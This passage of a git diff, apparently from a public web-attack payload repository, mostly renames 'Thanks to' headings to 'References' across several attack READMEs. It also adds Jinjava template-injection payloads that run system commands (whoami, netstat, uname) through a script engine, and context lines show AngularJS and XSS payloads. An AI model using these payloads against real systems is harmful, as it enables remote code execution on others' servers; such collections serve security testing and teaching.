com.[...].context.TemplateContextRequest@23548206 +``` + +Jinjava is an open source project developped by Hubspot, available at [https://github.com/HubSpot/jinjava/](https://github.com/HubSpot/jinjava/) + +### Jinjava - Command execution + +Fixed by https://github.com/HubSpot/jinjava/pull/230 + +```python +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}} + +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}} + +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} + + +{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"uname\\\",\\\"-a\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}} +``` + ## Client Side Template Injection ### AngularJS @@ -226,7 +257,7 @@ $eval('1+1') {{constructor.constructor('alert(1)')()}} ``` -## Thanks to +## References * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) @@ -235,4 +266,5 @@ $eval('1+1') * [PDF - Server-Side Template Injection: RCE for the modern webapp - @albinowax](https://www.blackhat.com/docs/us-15/materials/us-15-Kettle-Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf) * [VelocityServlet Expression Language injection](https://magicbluech.github.io/2017/12/02/VelocityServlet-Expression-language-Injection/) * [Cheatsheet - Flask & Jinja2 SSTI - Sep 3, 2018 • By phosphore](https://pequalsnp-team.github.io/cheatsheet/flask-jinja2-ssti) -* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) \ No newline at end of file +* [RITSEC CTF 2018 WriteUp (Web) - Aj Dumanhug](https://medium.com/@ajdumanhug/ritsec-ctf-2018-writeup-web-72a0e5aa01ad) +* [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw) \ No newline at end of file diff --git a/Tar commands execution/README.md b/Tar commands execution/README.md index 7e863cb..5b40859 100644 --- a/Tar commands execution/README.md +++ b/Tar commands execution/README.md @@ -12,7 +12,7 @@ These files work against a "tar *" shell.sh (your exploit code is here) ``` -## Thanks to +## References * [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) * [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) diff --git a/Traversal directory/README.md b/Traversal directory/README.md index d0c7f28..ac2d856 100644 --- a/Traversal directory/README.md +++ b/Traversal directory/README.md @@ -43,6 +43,6 @@ UTF-8 Unicode encoding \ = %c0%5c, %c0%80%5c ``` -## Thanks to +## References * [Directory traversal attack - Wikipedia](https://en.wikipedia.org/wiki/Directory_traversal_attack) diff --git a/Upload insecure files/README.md b/Upload insecure files/README.md index 006ad44..ab2d9a9 100644 --- a/Upload insecure files/README.md +++ b/Upload insecure files/README.md @@ -59,6 +59,6 @@ IE8: http://0me.me/demo/xss/xssproject.swf?js=try{alert(document.domain)}catch(e IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvalidfileinvalidfile’,’target’);setTimeout(‘alert(w.document.location);w.close();’,1); ``` -## Thanks to +## References * Bulletproof Jpegs Generator - Damien "virtualabs" Cauquil diff --git a/Web cache deception/README.md b/Web cache deception/README.md index 3e59cf3..7c81e96 100644 --- a/Web cache deception/README.md +++ b/Web cache deception/README.md @@ -50,7 +50,7 @@ Video of the attack by Omer Gil - Web Cache Deception Attack in PayPal Home Page ``` -## Thanks to +## References * [Web Cache Deception Attack - Omer Gil](http://omergil.blogspot.fr/2017/02/web-cache-deception-attack.html) * [Practical Web Cache Poisoning - James Kettle @albinowax](https://portswigger.net/blog/practical-web-cache-poisoning) diff --git a/XPATH injection/README.md b/XPATH injection/README.md index 33dc2ad..4b2eddc 100644 --- a/XPATH injection/README.md +++ b/XPATH injection/README.md @@ -33,7 +33,7 @@ substring(//user[userid=5]/username,2,1)=CHAR_HERE substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE) ``` -## Thanks to +## References * [OWASP XPATH Injection](https://www.owasp.org/index.php/Testing_for_XPath_Injection_(OTG-INPVAL-010)) * [XPATH Blind Explorer](http://code.google.com/p/xpath-blind-explorer/) diff --git a/XSS injection/README.md b/XSS injection/README.md index 3ce0402..b6d7078 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -859,7 +859,7 @@ Notification.requestPermission(x=>{new(Notification)(1)}) Try here : [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)//) -## Thanks to +## References - [Unleashing-an-Ultimate-XSS-Polyglot](https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot) - tbm diff --git a/XSS injection/XSS in Angular.md b/XSS injection/XSS in Angular.md index 85c1076..5e7ea66 100644 --- a/XSS injection/XSS in Angular.md +++ b/XSS injection/XSS in Angular.md @@ -149,6 +149,6 @@ Vue JS {{constructor.constructor('alert(1)')()}} ``` -## Thanks +## References -- [](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) \ No newline at end of file +- [XSS without HTML - CSTI with Angular JS - Portswigger](https://portswigger.net/blog/xss-without-html-client-side-template-injection-with-angularjs) \ No newline at end of file diff --git a/XSS injection/XSS with Relative Path Overwrite.md b/XSS injection/XSS with Relative Path Overwrite.md index ad488c2..d837908 100644 --- a/XSS injection/XSS with Relative Path Overwrite.md +++ b/XSS injection/XSS with Relative Path Overwrite.md @@ -42,3 +42,8 @@ From : `http://www.thespanner.co.uk/2014/03/21/rpo/` ``` IE will read and write (decode) HTML multiple time and attackers XSS payload will mutate and execute. + + +## References + +- [TODO](TODO) \ No newline at end of file diff --git a/XXE injection/README.md b/XXE injection/README.md index f85289f..554bdb0 100644 --- a/XXE injection/README.md +++ b/XXE injection/README.md @@ -188,7 +188,7 @@ JPG (experimental) GIF (experimental) ``` -## Thanks to +## References * [XML External Entity (XXE) Processing - OWASP](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing) * [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)